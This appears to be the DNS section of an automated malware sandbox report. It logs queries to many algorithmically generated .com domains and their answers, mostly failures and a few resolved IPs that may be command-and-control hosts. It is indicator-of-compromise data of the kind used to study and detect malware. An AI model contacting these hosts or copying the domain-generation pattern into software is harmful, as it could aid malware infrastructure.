                                                                                                                                                                                                          Nov 11, 2024 18:25:53.955358028 CET192.168.2.81.1.1.10x20bStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.955663919 CET192.168.2.81.1.1.10x836bStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.956146955 CET192.168.2.81.1.1.10xf641Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.956310987 CET192.168.2.81.1.1.10x294eStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.956368923 CET192.168.2.81.1.1.10xabd1Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.956625938 CET192.168.2.81.1.1.10x80dStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.957001925 CET192.168.2.81.1.1.10x2734Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.959009886 CET192.168.2.81.1.1.10x101eStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.959064960 CET192.168.2.81.1.1.10xc478Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.959242105 CET192.168.2.81.1.1.10x9859Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.963545084 CET192.168.2.81.1.1.10xa767Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.240614891 CET192.168.2.81.1.1.10x10a5Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.240789890 CET192.168.2.81.1.1.10x857eStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.241024971 CET192.168.2.81.1.1.10x41a5Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.241269112 CET192.168.2.81.1.1.10xc56Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.241600037 CET192.168.2.81.1.1.10xa7ebStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.241600037 CET192.168.2.81.1.1.10xab16Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.241884947 CET192.168.2.81.1.1.10xda92Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.245472908 CET192.168.2.81.1.1.10x759dStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.253058910 CET192.168.2.81.1.1.10x6e5dStandard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.264838934 CET192.168.2.81.1.1.10x628bStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.264838934 CET192.168.2.81.1.1.10x81d3Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.265434980 CET192.168.2.81.1.1.10x1a70Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.265779972 CET192.168.2.81.1.1.10x82bdStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.266103029 CET192.168.2.81.1.1.10x4816Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.268924952 CET192.168.2.81.1.1.10xb5cfStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.272532940 CET192.168.2.81.1.1.10x3345Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.273534060 CET192.168.2.81.1.1.10x8fc0Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.300753117 CET192.168.2.81.1.1.10xb04dStandard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.304682016 CET192.168.2.81.1.1.10xd3ffStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.304974079 CET192.168.2.81.1.1.10xd545Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.311256886 CET192.168.2.81.1.1.10x5a59Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.312716007 CET192.168.2.81.1.1.10x957bStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.316940069 CET192.168.2.81.1.1.10x6064Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.334131002 CET192.168.2.81.1.1.10xfcfdStandard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.345004082 CET192.168.2.81.1.1.10x7da4Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.348155022 CET192.168.2.81.1.1.10xfe55Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.350640059 CET192.168.2.81.1.1.10xa9c4Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.371795893 CET192.168.2.81.1.1.10x1c7dStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.371795893 CET192.168.2.81.1.1.10x61ddStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.372198105 CET192.168.2.81.1.1.10x4caaStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.372639894 CET192.168.2.81.1.1.10xaca0Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.372912884 CET192.168.2.81.1.1.10x903cStandard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.373558044 CET192.168.2.81.1.1.10x22cbStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.373961926 CET192.168.2.81.1.1.10x8b09Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.373961926 CET192.168.2.81.1.1.10x4421Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.374283075 CET192.168.2.81.1.1.10xff4bStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.374500036 CET192.168.2.81.1.1.10x2856Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.374743938 CET192.168.2.81.1.1.10xffefStandard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.374947071 CET192.168.2.81.1.1.10x3e9bStandard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.375340939 CET192.168.2.81.1.1.10x6425Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.375674963 CET192.168.2.81.1.1.10x7587Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406135082 CET192.168.2.81.1.1.10x1cfcStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406739950 CET192.168.2.81.1.1.10x395fStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406739950 CET192.168.2.81.1.1.10xa5fdStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406979084 CET192.168.2.81.1.1.10x4dc7Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407196045 CET192.168.2.81.1.1.10x85c5Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407308102 CET192.168.2.81.1.1.10x2a89Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407541037 CET192.168.2.81.1.1.10x8127Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407541037 CET192.168.2.81.1.1.10x62eeStandard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407557011 CET192.168.2.81.1.1.10xe2a9Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET192.168.2.81.1.1.10x6b84Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET192.168.2.81.1.1.10xe735Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET192.168.2.81.1.1.10xe08aStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408118010 CET192.168.2.81.1.1.10x6121Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408118010 CET192.168.2.81.1.1.10x58c9Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408327103 CET192.168.2.81.1.1.10x594fStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408576965 CET192.168.2.81.1.1.10xc8e3Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408576965 CET192.168.2.81.1.1.10xc83fStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408830881 CET192.168.2.81.1.1.10xd671Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408989906 CET192.168.2.81.1.1.10xbabeStandard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410247087 CET192.168.2.81.1.1.10x82ccStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410247087 CET192.168.2.81.1.1.10xcaf2Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410456896 CET192.168.2.81.1.1.10x4838Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.411586046 CET192.168.2.81.1.1.10x3cf2Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.652163982 CET192.168.2.81.1.1.10x5174Standard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.652906895 CET192.168.2.81.1.1.10xc127Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.660641909 CET192.168.2.81.1.1.10x8676Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.663536072 CET192.168.2.81.1.1.10x2a5Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.682539940 CET192.168.2.81.1.1.10x3110Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.696464062 CET192.168.2.81.1.1.10x60e1Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.696753025 CET192.168.2.81.1.1.10x38acStandard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.696822882 CET192.168.2.81.1.1.10xb46aStandard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.710186005 CET192.168.2.81.1.1.10xead6Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.711384058 CET192.168.2.81.1.1.10x21f9Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.711750984 CET192.168.2.81.1.1.10xe884Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.712996006 CET192.168.2.81.1.1.10xff6cStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.713526011 CET192.168.2.81.1.1.10xa54eStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.713711977 CET192.168.2.81.1.1.10xb1c8Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.714175940 CET192.168.2.81.1.1.10x2605Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.714302063 CET192.168.2.81.1.1.10x9d96Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.714899063 CET192.168.2.81.1.1.10xcae4Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.715432882 CET192.168.2.81.1.1.10xf274Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.715833902 CET192.168.2.81.1.1.10x5ea5Standard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.716526985 CET192.168.2.81.1.1.10x2e71Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.716918945 CET192.168.2.81.1.1.10xf9bfStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.717855930 CET192.168.2.81.1.1.10xb69aStandard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.718132019 CET192.168.2.81.1.1.10xf4afStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.719007969 CET192.168.2.81.1.1.10x197Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.719320059 CET192.168.2.81.1.1.10x905cStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.720046997 CET192.168.2.81.1.1.10x15b4Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.720366001 CET192.168.2.81.1.1.10xde8fStandard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.720979929 CET192.168.2.81.1.1.10xe143Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.721273899 CET192.168.2.81.1.1.10x3ca9Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.722183943 CET192.168.2.81.1.1.10x143Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.722948074 CET192.168.2.81.1.1.10x182eStandard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.724102020 CET192.168.2.81.1.1.10x6714Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.724224091 CET192.168.2.81.1.1.10xe2f9Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.724656105 CET192.168.2.81.1.1.10x197aStandard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.725210905 CET192.168.2.81.1.1.10x271aStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.726013899 CET192.168.2.81.1.1.10x56ceStandard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.726300955 CET192.168.2.81.1.1.10xa496Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.726527929 CET192.168.2.81.1.1.10xdb1eStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.727225065 CET192.168.2.81.1.1.10x1eb4Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.727775097 CET192.168.2.81.1.1.10xa5f6Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.728027105 CET192.168.2.81.1.1.10xee06Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729032040 CET192.168.2.81.1.1.10xd6d1Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729197979 CET192.168.2.81.1.1.10x1f86Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729897022 CET192.168.2.81.1.1.10xa1d2Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.730513096 CET192.168.2.81.1.1.10xf1feStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.731066942 CET192.168.2.81.1.1.10x26d5Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.817194939 CET192.168.2.81.1.1.10xd1cStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.818289042 CET192.168.2.81.1.1.10xb92bStandard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.829473972 CET192.168.2.81.1.1.10x1b68Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.830580950 CET192.168.2.81.1.1.10xc446Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.831501007 CET192.168.2.81.1.1.10x2ce5Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.832046986 CET192.168.2.81.1.1.10x2783Standard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.839334965 CET192.168.2.81.1.1.10x308aStandard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.846914053 CET192.168.2.81.1.1.10x2f85Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.916079998 CET192.168.2.81.1.1.10x83dStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.917156935 CET192.168.2.81.1.1.10x3887Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.917670012 CET192.168.2.81.1.1.10xba91Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.918329000 CET192.168.2.81.1.1.10xcd13Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.918715954 CET192.168.2.81.1.1.10x84c3Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.919599056 CET192.168.2.81.1.1.10x1b56Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.920340061 CET192.168.2.81.1.1.10x8abfStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.920814991 CET192.168.2.81.1.1.10xc19dStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.924443007 CET192.168.2.81.1.1.10x36bcStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.925867081 CET192.168.2.81.1.1.10xf5eeStandard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.561119080 CET192.168.2.81.1.1.10x2bStandard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.583281040 CET192.168.2.81.1.1.10x567aStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.579651117 CET1.1.1.1192.168.2.80x4d37Name error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.582765102 CET1.1.1.1192.168.2.80x3466Name error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.590806007 CET1.1.1.1192.168.2.80xd1dName error (3)vopybyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.609909058 CET1.1.1.1192.168.2.80xfac0Name error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.612533092 CET1.1.1.1192.168.2.80x2c8cName error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.640341043 CET1.1.1.1192.168.2.80xb5a7Name error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.641352892 CET1.1.1.1192.168.2.80x809aName error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.643305063 CET1.1.1.1192.168.2.80xc6c0Name error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.645742893 CET1.1.1.1192.168.2.80x45c0Name error (3)ganypih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.650207996 CET1.1.1.1192.168.2.80x9cabName error (3)pumyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.651060104 CET1.1.1.1192.168.2.80x8061Name error (3)qedyfyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.668104887 CET1.1.1.1192.168.2.80x6984Name error (3)qebytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.671308994 CET1.1.1.1192.168.2.80x323fName error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.828006983 CET1.1.1.1192.168.2.80x9f6No error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.886693001 CET1.1.1.1192.168.2.80x1fcaName error (3)qetyvep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.888825893 CET1.1.1.1192.168.2.80x72acName error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.889988899 CET1.1.1.1192.168.2.80x3c25No error (0)galyqaz.com199.191.50.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.894975901 CET1.1.1.1192.168.2.80x2b5dName error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.897285938 CET1.1.1.1192.168.2.80x15a2Name error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.900051117 CET1.1.1.1192.168.2.80x12cfName error (3)vojyjof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.902669907 CET1.1.1.1192.168.2.80x6448Name error (3)vocyruk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.915275097 CET1.1.1.1192.168.2.80x31dName error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.937978029 CET1.1.1.1192.168.2.80x51adName error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.938421965 CET1.1.1.1192.168.2.80x779dName error (3)qekykev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.938699007 CET1.1.1.1192.168.2.80xd739Name error (3)purydyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.939672947 CET1.1.1.1192.168.2.80x4641Name error (3)pufygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.939749002 CET1.1.1.1192.168.2.80x163Name error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940546036 CET1.1.1.1192.168.2.80x4d5fName error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941019058 CET1.1.1.1192.168.2.80x7cc3Name error (3)qegyqaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941464901 CET1.1.1.1192.168.2.80x906bName error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941687107 CET1.1.1.1192.168.2.80xa858Name error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.942047119 CET1.1.1.1192.168.2.80xdd21Name error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.947093010 CET1.1.1.1192.168.2.80x9350Name error (3)puvytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.949137926 CET1.1.1.1192.168.2.80xbb47Name error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.949289083 CET1.1.1.1192.168.2.80x7b4dName error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.949934006 CET1.1.1.1192.168.2.80x46d4No error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.950393915 CET1.1.1.1192.168.2.80x33b0Name error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.952986002 CET1.1.1.1192.168.2.80xd79bName error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.953887939 CET1.1.1.1192.168.2.80xa38Name error (3)puzywel.comnonenoneA (IP address)IN (0x0001)false
